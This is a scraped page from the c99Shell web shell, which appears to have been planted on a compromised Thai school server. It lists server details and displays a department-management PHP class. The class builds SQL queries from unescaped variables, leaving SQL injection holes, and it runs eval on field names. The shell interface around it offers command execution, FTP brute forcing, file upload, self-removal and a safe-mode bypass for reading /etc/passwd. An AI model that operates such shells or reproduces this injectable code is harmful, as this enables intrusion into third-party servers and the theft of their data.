!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/clas/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clsDepartment.php (8.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//--Class department--------------------------
//--PK of department ::
//	1. departmentId
include_once "../link/keyThai.php";
include_once "clsDB.php";

class Department extends clsDB{

var $result;

var $deptId;
var $deptName;
var $deptDesc;
var $deptCode;
var $deptParent;
var $deptYear;
var $deptDate;
var $deptRef;
var $pbriId;
var $deptIsCenter;
var $receiveIn;
var $receiveOut;
var $sendIn;
var $sendOut;
var $deptNo;
var $docGroup;
var $depttypeId;
var $deptParentId;
var $deptLevel;
var $deptGroup;

function Department(&$c){
	$this->c=$c->c;
	$this->DB=$c->db;
}

function Save(){
	if ($this->status==1){
		$this->departmentId=$this->GetNextCode();
		$sql = "insert into Department values(
			'$this->deptId',
 			'$this->deptName',
 			'$this->deptDesc',
 			'$this->deptCode',
 			'$this->deptParent',
 			'$this->deptYear',
 			'$this->deptDate',
 			'$this->deptRef',
			'$this->pbriId',
 			'$this->deptIsCenter',
			'$this->receiveIn',
 			'$this->receiveOut',
 			'$this->sendIn',
			'$this->sendOut',
			'".th2a($this->deptNo)."',
 			'$this->docGroup',
			'$this->depttypeId',
			'$this->deptParentId',
			'$this->deptLevel',
			'$this->deptGroup')";
	}else {
		$sql = "update Department set 
			deptName='$this->deptName', 
			deptDesc='$this->deptDesc', 
			deptCode='$this->deptCode', 
			deptParent='$this->deptParent', 
			deptYear='$this->deptYear', 
			deptDate='$this->deptDate', 
			deptRef='$this->deptRef', 
			pbriId='$this->pbriId', 
			deptIsCenter='$this->deptIsCenter', 
			receiveIn='$this->receiveIn', 
			receiveOut='$this->receiveOut', 
			sendIn='$this->sendIn',
			sendOut='$this->sendOut',
			deptNo='".th2a($this->deptNo)."',
			docGroup='$this->docGroup',
			depttypeId='$this->depttypeId',
			deptParentId='$this->deptParentId',
			deptLevel='$this->deptLevel',
			deptGroup='$this->deptGroup'
			where deptId='$this->deptId'";
	}
	return $this->Dml($sql);
}

function Delete(){
	return $this->Dml("delete from Department where deptId='$this->deptId'");
}

function GetNextCode(){
	$this->SetQuery("select max(deptId) as num from Department");
	if ($result=$this->GetResult()) {
		return $result['num']+1;
	}
}

function RSdepartment(){
	$this->SetQuery("select * from Department order by deptId");
}

function GetRecord(){
	$numFields = $this->NumField();
	$row = $this->GetResult();
	if ($row){
		for ($i=0; $i<$numFields; $i++){
			eval("\$this->".mysql_field_name($this->rs, $i)."=\$row['".mysql_field_name($this->rs, $i)."'];");
			$this->deptName=a2th($this->deptName);
			$this->deptDesc=a2th($this->deptDesc);
		}
		return true;
	}else{	// clear value of Member;
		for ($i=0; $i<$numFields; $i++){
			eval("\$this->".mysql_field_name($this->rs, $i)."='';");
		}
		return false;
	}
}
function SearchByKey($xKey){
	if ($this->SetQuery("select * from Department where deptId= '$xKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
//****************** You can add new functions below **********************//
function SearchByDeptRef($xKey){
	if($this->SetQuery("select * from Department where deptRef = '$xKey'")){
		return 1;
	}else {
		return 0;
	}
}
function SearchBydeptParent(){ /////
	$this->SetQuery("select deptName from Department");
}

function RSDeptByMaxdeptDate(){
	$maxdate = $this->MaxDate();
	$this->SetQuery("select * from Department where deptDate = '$maxdate'  order by deptId asc");
}
function MaxDate(){
	$this->SetQuery("select max(deptDate) as num from Department");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function searchMaxDate($xKey){
	if($this->SetQuery("select  deptDate from Department where deptDate >'$xKey' order by deptDate asc limit 1")){
		return 1;
	}else {
		return 0;
	}
}
function SearchDeptByMaxdeptDate($xKey){
	$maxdate = $this->MaxDate();
	$this->SetQuery("select * from Department where deptId='$xKey' and deptDate = '$maxdate' order by deptId");
}

function SearchMaxDocGroup(){
	$this->SetQuery("select max(docGroup) as num from Department");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function SearchBydeptDateDocGroup($xKey){
	$this->SetQuery("select * from Department where docGroup='$xKey' order by deptId");
}
function SearchBydeptDateDocGroup2($xKey){
	$this->SetQuery("select * from Department where docGroup='$xKey'   order by deptId");
}
function SearchDeptName($xKey){
	$this->SetQuery("select deptName as name from Department where deptId= '$xKey'");
	if ($result=$this->GetResult()) {
		return $result['name'];
	}
}
function SearchBydeptParentnot0($xKey){ /////
	$this->SetQuery("select * from Department where  deptDate!='$xKey' order by deptDate desc ,deptId asc");
}
function RSMainDepartment(){
	$maxdate = $this->MaxDate();
	$sql = "select * from Department where deptParentId=0 and deptDate = '$maxdate' order by deptParentId";
	$this->SetQuery($sql);
}
function searchdeptDate2($xKey){
	$this->SetQuery("select * from Department where deptParentId=0 and deptDate='$xKey' order by deptParentId asc , deptId asc");
}
function searchdeptDate($xKey){
	$this->SetQuery("select deptId from Department where deptParentId=0 and deptDate='$xKey' order by deptParentId asc , deptId asc");
}
function RSmenuByDeptParent2($dId){
	$maxdate = $this->MaxDate();
	$sql = "select * from Department where deptParentId='$dId' and deptDate = '$maxdate' order by deptId";
	$this->SetQuery($sql);
}
function RSmenuByDeptParent3($dId){
	$maxdate = $this->MaxDate();
	$sql = "select deptId from Department where deptParentId='$dId' and deptDate = '$maxdate' order by deptId";
	$this->SetQuery($sql);
}
function RSDeptByMaxdeptDate2(){
	$maxdate = $this->MaxDate();
	$this->SetQuery("select * from Department where deptDate = '$maxdate' order by deptId asc");
}
function SearchNameDeptByMaxdeptDate($xKey){
	$maxdate = $this->MaxDate();
	$this->SetQuery("select deptName from Department where deptId='$xKey' and deptDate = '$maxdate' order by deptId");
}


//---------------for semi system-------------------------------------------------------------------------------------
function RSdeptGroupBydeptDate($xKey){
	$sql = "select deptDate from Department group by deptDate order by deptDate desc";
	$this->SetQuery($sql);
}
function RSMainDepartmentdeptDate($xKey){
	$sql = "select deptId from Department where deptParentId=0 and deptDate='$xKey' order by deptParentId asc , deptId asc";
	$this->SetQuery($sql);
}
function RSMainDepartment2($xKey,$yKey){
	$sql = "select deptId from Department where deptParentId=0 and deptDate='0000-00-00' order by deptParentId asc , deptId asc";
	$this->SetQuery($sql);
}
function RSmenuByDeptParent2deptdate0($dId){
	$sql = "select deptId from Department where deptParentId=$dId and deptDate = '0000-00-00' order by deptId";
	$this->SetQuery($sql);
}
function RSdepthavedeptParentId($xKey){
	$sql = "select * from Department where deptParentId ='$xKey'";
	$this->SetQuery($sql);
}
function RSmenuByDeptParent2deptdate0deptDate($dId,$xKey){
	$sql = "select deptId from Department where deptParentId=$dId and deptDate='$xKey' order by deptId";
	$this->SetQuery($sql);
}
function RSmenuByDeptParentdeptDate($dId,$deptDate){
	$sql = "select * from Department where deptParentId=$dId and deptDate = '$deptDate' order by deptId";
	$this->SetQuery($sql);
}
function MaxDatepeople($dbperson){
	$this->SetQuery("select max(deptDate) as num from $dbperson.Department");
	if ($result=$this->GetResult()) {
		return $result['num'];
	}
}
function RSDeptByMaxdeptDatepeople($dbperson){
	$maxdate = $this->MaxDatepeople($dbperson);
	$this->SetQuery("select * from $dbperson.Department where deptDate = '$maxdate'  and  deptParent=1 order by deptId asc");
}
function searchdeptDate_($xKey){
	$this->SetQuery("select * from Department where deptDate='$xKey' order by deptId asc");
}
function SearchByKeypeople($dbperson,$deptId){
	$this->SetQuery("select * from $dbperson.Department where deptId='$deptId'");
}
function RSdeptSetgroupHeaddeptDate0(){
	$sql = "select * from Department where depttypeId < '3' and  deptDate='0000-00-00'";
	$this->SetQuery($sql);
}
function RSMainDepartmentdeptDate0(){
	$sql = "select * from Department  where  deptDate='0000-00-00' order by deptParentId";
	$this->SetQuery($sql);
}
function SearchByShowDocNo($deptId){
	$sql = "select deptLevel, deptParentId from Department  where deptId='$deptId'";
	$this->SetQuery($sql);
}
function SearchByShowselectdoc($deptId){
	$sql = "select deptId, deptParentId, deptName from Department  where deptId='$deptId'";
	$this->SetQuery($sql);
}
} //--End class department--
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--